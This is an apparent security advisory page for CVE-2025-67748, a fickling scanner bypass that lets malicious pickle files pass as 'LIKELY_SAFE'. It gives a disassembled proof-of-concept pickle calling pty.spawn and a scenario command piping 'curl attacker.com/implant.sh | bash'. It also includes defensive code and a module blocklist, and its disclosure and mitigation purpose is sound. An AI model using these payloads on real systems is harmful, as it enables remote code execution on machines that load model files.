CVE-2025-67748: fickling: Code Injection enables RCE

GHSA-r7v6-mfhq-g3m2 HIGH CISA: ATTEND
Published December 15, 2025
CISO Take

If your ML pipeline uses Fickling to validate pickle files before loading models, your security gate has been bypassable since before the fix in 0.1.6. A crafted pickle embedding pty.spawn() with a single appended BUILD opcode passes Fickling's checks as 'LIKELY_SAFE' while executing arbitrary code on deserialization. Upgrade to fickling >= 0.1.6 immediately and treat any model files previously cleared by older versions from untrusted sources as unvetted.

Risk Assessment

High risk for organizations that rely on Fickling as a model validation control — this is a security control bypass, not just a vulnerability. Exploitability is moderate: a public PoC exists in the advisory and requires only knowledge of pickle opcodes plus awareness of Fickling's heuristic. EPSS is very low (0.00032) and the CVE is not in CISA KEV, indicating no confirmed widespread exploitation yet. However, any targeted attacker aware of Fickling deployments in ML pipelines has a working bypass technique. The blast radius is full arbitrary code execution on whatever host loads the malicious file.

Affected Systems

| Package  | Ecosystem | Vulnerable Range | Patched |
|----------|-----------|------------------|---------|
| fickling | pip       | < 0.1.6          | 0.1.6   |

Do you use fickling? You're affected.

Severity & Risk

CVSS 3.1: N/A
EPSS: 0.0% chance of exploitation in 30 days (higher than 12% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Moderate
Exploitation Confidence: medium (CISA SSVC: Public PoC)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

5 steps
  1. Upgrade fickling to >= 0.1.6 immediately — this release patches both the pty blocklist gap (missing from unsafe module imports) and the BUILD opcode bypass of the unused-variable heuristic.

  2. Audit all pickle files from untrusted sources that were validated by fickling < 0.1.6 — treat them as unverified and re-scan them with the patched version.

  3. Add defense-in-depth: sandbox pickle loading in isolated subprocesses or containers with no network access; use PyTorch's torch.load() with weights_only=True where feasible; enforce allowlist-only module imports at the deserializer level.

  4. Detection: grep fickling scan logs for LIKELY_SAFE verdicts on files containing pty, spawn references, or BUILD opcodes immediately following a REDUCE — these are indicators of the bypass pattern.

  5. Consider supplementing Fickling with static binary analysis of pickle streams independent of heuristic-based tools.
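The allowlist-only deserializer recommended in step 3 can be sketched with the standard library's `pickle.Unpickler.find_class` hook. The `SAFE_GLOBALS` set below is a hypothetical example; extend it with the classes your model files legitimately contain.

```python
import io
import pickle

# Hypothetical allowlist for illustration; extend it with the specific
# globals your model files legitimately reference.
SAFE_GLOBALS = {
    ("collections", "OrderedDict"),
    ("builtins", "list"),
}

class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global not explicitly allowed,
    so opcodes like STACK_GLOBAL/REDUCE cannot reach pty.spawn, os.system, etc."""

    def find_class(self, module, name):
        if (module, name) not in SAFE_GLOBALS:
            raise pickle.UnpicklingError(
                f"blocked global during unpickling: {module}.{name}"
            )
        return super().find_class(module, name)

def safe_loads(data: bytes):
    """Deserialize with the allowlist enforced."""
    return AllowlistUnpickler(io.BytesIO(data)).load()
```

Unlike a heuristic verdict, this fails closed: any pickle that imports a module outside the allowlist raises instead of executing.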

CISA SSVC Assessment

Decision: Attend
Exploitation: poc
Automatable: No
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.1.2 - AI supply chain security
NIST AI RMF
MANAGE-2.2 - Risk management mechanisms for AI trustworthiness
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-67748?

If your ML pipeline uses Fickling to validate pickle files before loading models, your security gate has been bypassable since before the fix in 0.1.6. A crafted pickle embedding pty.spawn() with a single appended BUILD opcode passes Fickling's checks as 'LIKELY_SAFE' while executing arbitrary code on deserialization. Upgrade to fickling >= 0.1.6 immediately and treat any model files previously cleared by older versions from untrusted sources as unvetted.

Is CVE-2025-67748 actively exploited?

No confirmed active exploitation of CVE-2025-67748 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-67748?

1. Upgrade fickling to >= 0.1.6 immediately — this release patches both the pty blocklist gap (missing from unsafe module imports) and the BUILD opcode bypass of the unused-variable heuristic.
2. Audit all pickle files validated by fickling < 0.1.6 from untrusted sources since your last upgrade — treat them as unverified and re-scan.
3. Add defense-in-depth: sandbox pickle loading in isolated subprocesses or containers with no network access; use PyTorch's torch.load() with weights_only=True where feasible; enforce allowlist-only module imports at the deserializer level.
4. Detection: grep fickling scan logs for LIKELY_SAFE verdicts on files containing pty, spawn references, or BUILD opcodes immediately following a REDUCE — these are indicators of the bypass pattern.
5. Consider supplementing Fickling with static binary analysis of pickle streams independent of heuristic-based tools.

What systems are affected by CVE-2025-67748?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, model registries, MLOps/CI-CD pipelines, agent frameworks.

What is the CVSS score for CVE-2025-67748?

No CVSS score has been assigned yet.

Technical Details

NVD Description

## Fickling Assessment

Based on the test case provided in the original report below, this bypass was caused by `pty` missing from our block list of unsafe module imports (as previously documented in #108), rather than by the unused-variable heuristic. This led to unsafe pickles based on `pty.spawn()` being incorrectly flagged as `LIKELY_SAFE`, and was fixed in https://github.com/trailofbits/fickling/pull/187.

## Original report

### Summary

An unsafe deserialization vulnerability in Fickling allows a crafted pickle file to bypass the "unused variable" heuristic, enabling arbitrary code execution. The bypass adds a trivial operation to the pickle file that "uses" the otherwise unused variable left on the stack after a malicious operation, tricking the detection mechanism into classifying the file as safe.

### Details

Fickling relies on the heuristic of detecting unused variables in the VM's stack after execution. Opcodes like `REDUCE`, `OBJ`, and `INST`, which can be used for arbitrary code execution, leave a value on the stack that is often unused in malicious pickle files. This vulnerability enables a bypass by modifying the pickle file to use this leftover value. A simple way to achieve this is to add a `BUILD` opcode that, in effect, adds a `__setstate__` to the unused variable. This makes Fickling consider the variable "used," thus failing to flag the malicious file.

### PoC

The following is a disassembled view of a malicious pickle file that bypasses Fickling's "unused variable" detection:

```
    0: \x80 PROTO      4
    2: \x95 FRAME      26
   11: \x8c SHORT_BINUNICODE 'pty'
   16: \x94 MEMOIZE    (as 0)
   17: \x8c SHORT_BINUNICODE 'spawn'
   24: \x94 MEMOIZE    (as 1)
   25: \x93 STACK_GLOBAL
   26: \x94 MEMOIZE    (as 2)
   27: \x8c SHORT_BINUNICODE 'id'
   31: \x94 MEMOIZE    (as 3)
   32: \x85 TUPLE1
   33: \x94 MEMOIZE    (as 4)
   34: R    REDUCE
   35: \x94 MEMOIZE    (as 5)
   36: \x8c SHORT_BINUNICODE 'gottem'
   44: \x94 MEMOIZE    (as 6)
   45: b    BUILD
   46: .    STOP
```

Here, the additions to the original pickle file can be seen at offsets 35, 36, 44, and 45. When analyzing this modified file, Fickling fails to identify it as malicious and reports it as **"LIKELY_SAFE"**:

```
{
  "severity": "LIKELY_SAFE",
  "analysis": "Warning: Fickling failed to detect any overtly unsafe code,but the pickle file may still be unsafe.Do not unpickle this file if it is from an untrusted source!\n\n",
  "detailed_results": {}
}
```

### Impact

This allows an attacker to craft a malicious pickle file that bypasses Fickling, since it relies on the "unused variable" heuristic to flag pickle files as unsafe. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues.
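The REDUCE-then-BUILD pattern shown in the PoC can be screened for statically with the standard library's `pickletools.genops`, which parses opcodes without executing the stream. The following is a rough sketch only; the `SUSPICIOUS_MODULES` set here is illustrative, not fickling's actual blocklist.

```python
import pickletools

# Hypothetical blocklist for illustration; a real scanner should mirror
# fickling's (post-0.1.6) list of unsafe module imports.
SUSPICIOUS_MODULES = {"pty", "os", "posix", "nt", "subprocess", "builtins"}

def flag_bypass_pattern(data: bytes) -> list:
    """Statically scan a pickle stream (no execution) for two indicators:
    string/global references to dangerous modules, and a BUILD opcode
    applied after a call opcode (REDUCE/OBJ/INST) -- the trick used to
    defeat the unused-variable heuristic."""
    findings = []
    last_call_pos = None
    for opcode, arg, pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "STACK_GLOBAL", "SHORT_BINUNICODE",
                           "BINUNICODE", "UNICODE"):
            # GLOBAL args look like "module name"; take the first token.
            if isinstance(arg, str) and arg.partition(" ")[0] in SUSPICIOUS_MODULES:
                findings.append(f"suspicious module reference {arg!r} at offset {pos}")
        if opcode.name in ("REDUCE", "OBJ", "INST"):
            last_call_pos = pos
        elif opcode.name == "BUILD" and last_call_pos is not None:
            findings.append(f"BUILD at offset {pos} after call at offset {last_call_pos}")
    return findings
```

Run against the PoC bytes above, this flags both the `pty` reference and the trailing BUILD; a benign pickle of plain containers produces no findings.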

Exploitation Scenario

An attacker targeting an organization's model ingestion pipeline confirms via job postings or GitHub that the org uses Fickling to screen models. They craft a malicious .pkl file that embeds pty.spawn('/bin/bash', ['/bin/bash', '-c', 'curl attacker.com/implant.sh | bash']) via a REDUCE opcode, then append a BUILD opcode with a dummy value to 'use' the leftover stack variable, neutralizing Fickling's unused-variable heuristic. The file is submitted to the org's internal model registry or a shared community hub the org pulls from. An automated pipeline or data scientist downloads and loads the model — triggering arbitrary code execution on the ML training server or serving container — achieving a foothold for lateral movement into broader ML infrastructure, data stores, or secrets managers.
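One way to contain this scenario is the subprocess isolation recommended in the action steps: unpickle in a throwaway child interpreter, so any code that runs during deserialization cannot touch the parent process's memory or credentials. A minimal sketch follows; real deployments should also drop network access and add container or seccomp sandboxing, which this example does not do.

```python
import subprocess
import sys

# Child script: unpickle the file and report only the top-level type name.
LOADER = r"""
import pickle, sys
with open(sys.argv[1], "rb") as f:
    obj = pickle.load(f)
print(type(obj).__name__)
"""

def load_in_subprocess(path: str, timeout: int = 30) -> str:
    """Unpickle `path` in a disposable child interpreter and return the
    type name of the loaded object. A malicious payload still executes,
    but inside a process that is discarded and shares no state with the
    caller (pair with container/network isolation in production)."""
    result = subprocess.run(
        [sys.executable, "-c", LOADER, path],
        capture_output=True, text=True, timeout=timeout,
    )
    if result.returncode != 0:
        raise RuntimeError(f"unpickling failed: {result.stderr.strip()}")
    return result.stdout.strip()
```

This pattern inspects untrusted files without granting them the parent's privileges; the allowlist and static-scan controls from the action steps should still run first.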

Timeline

Published
December 15, 2025
Last Modified
January 16, 2026
First Seen
March 24, 2026

Related Vulnerabilities